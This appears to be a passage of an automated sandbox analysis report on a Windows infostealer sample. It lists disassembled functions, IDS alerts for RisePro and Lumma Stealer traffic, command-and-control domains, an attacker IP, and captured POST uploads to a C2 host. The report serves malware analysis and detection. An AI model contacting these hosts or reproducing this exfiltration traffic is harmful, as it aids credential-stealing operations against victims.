                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00D52870 FindFirstFileA,FindNextFileA,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError,GetLastError,std::_Throw_Cpp_error,std::_Throw_Cpp_error,CreateDirectoryA,std::_Throw_Cpp_error,std::_Throw_Cpp_error,0_2_00D52870
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00C8C82B FindFirstFileExW,GetLastError,0_2_00C8C82B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+70h]7_2_00417239
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, dword ptr [esp+00000080h]7_2_004212B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi]7_2_00415390
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then inc ebx7_2_00421670
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp+08h]7_2_0043B800
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp+0Ch]7_2_00435ACB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+10h]7_2_00409D20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, dword ptr [esp+0Ch]7_2_0043AE30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 18DC7455h7_2_00421F80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx7_2_0041403B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then test edi, edi7_2_0043A0D9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [edx]7_2_00432140
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp+18h]7_2_0041D128
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, dword ptr [esi+000001C0h]7_2_00424240
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], dx7_2_00415216
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, dword ptr [esp+04h]7_2_0043822F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movsx ecx, byte ptr [esi+eax]7_2_0040D2C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], dx7_2_0041B2A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then xor eax, eax7_2_00439461
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, dword ptr [esp+0Ch]7_2_0043B470
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+000000F0h]7_2_0041347E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp+04h]7_2_004384D6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]7_2_004025E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx7_2_00416582
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then inc ebx7_2_004216CE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then not ecx7_2_004176E1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 0AB35B01h7_2_00413722
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+00000180h]7_2_00411739
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]7_2_0040F7CD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [esi+edi+02h], 0000h7_2_0041B930
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx7_2_0043799B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]7_2_00416A62
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+70h]7_2_00417A78
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edx], al7_2_00422B54
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edx], al7_2_00422B70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx7_2_00417BF5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+000008A0h]7_2_0041FBB5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esi+00000600h], 00000000h7_2_00410C5B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ecx], al7_2_00416E69
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then push edi7_2_0040FED9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esi+00000600h], 00000000h7_2_00410F4D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then inc ebx7_2_00414F10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+000008A0h]7_2_0041EF19

                  Networking

                  barindex
                  Snort IDS alert for network traffic
                  Source: TrafficSnort IDS: 2049060 ET TROJAN RisePro TCP Heartbeat Packet 192.168.2.4:49732 -> 193.233.132.253:50500
                  Source: TrafficSnort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 193.233.132.253:50500 -> 192.168.2.4:49732
                  Source: TrafficSnort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP (Activity) 192.168.2.4:49732 -> 193.233.132.253:50500
                  Source: TrafficSnort IDS: 2046267 ET TROJAN [ANY.RUN] RisePro TCP (External IP) 193.233.132.253:50500 -> 192.168.2.4:49732
                  Source: TrafficSnort IDS: 2052033 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (bordersoarmanusjuw .shop) 192.168.2.4:52093 -> 1.1.1.1:53
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49742 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49743 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49744 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49745 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49746 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49747 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49748 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49749 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49750 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49751 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49752 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49753 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49754 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49755 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49756 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49757 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49758 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49759 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49760 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49761 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49762 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49763 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49764 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49765 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49766 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49767 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49768 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49769 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49770 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49771 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49772 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49773 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49774 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49775 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49776 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49777 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49778 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49779 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49780 -> 172.67.189.66:443
                  Source: TrafficSnort IDS: 2052042 ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) 192.168.2.4:49781 -> 172.67.189.66:443
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: wifeplasterbakewis.shop
                  Source: Malware configuration extractorURLs: mealplayerpreceodsju.shop
                  Source: Malware configuration extractorURLs: bordersoarmanusjuw.shop
                  Source: Malware configuration extractorURLs: suitcaseacanehalk.shop
                  Source: Malware configuration extractorURLs: absentconvicsjawun.shop
                  Source: Malware configuration extractorURLs: pushjellysingeywus.shop
                  Source: Malware configuration extractorURLs: economicscreateojsu.shop
                  Source: Malware configuration extractorURLs: entitlementappwo.shop
                  Source: Malware configuration extractorURLs: bordersoarmanusjuw.shop
                  Source: global trafficTCP traffic: 192.168.2.4:49732 -> 193.233.132.253:50500
                  Source: Joe Sandbox ViewIP Address: 34.117.186.192 34.117.186.192
                  Source: Joe Sandbox ViewIP Address: 34.117.186.192 34.117.186.192
                  Source: Joe Sandbox ViewIP Address: 104.26.5.15 104.26.5.15
                  Source: Joe Sandbox ViewIP Address: 193.233.132.253 193.233.132.253
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: unknownDNS query: name: ipinfo.io
                  Source: unknownDNS query: name: ipinfo.io
                  Source: global trafficHTTP traffic detected: GET /widget/demo/81.181.57.52 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
                  Source: global trafficHTTP traffic detected: GET /demo/home.php?s=81.181.57.52 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7091Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1411Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7091Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7091Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1411Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1411Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 584825Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 584853Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 585358Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7091Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1412Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 584522Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: bordersoarmanusjuw.shop
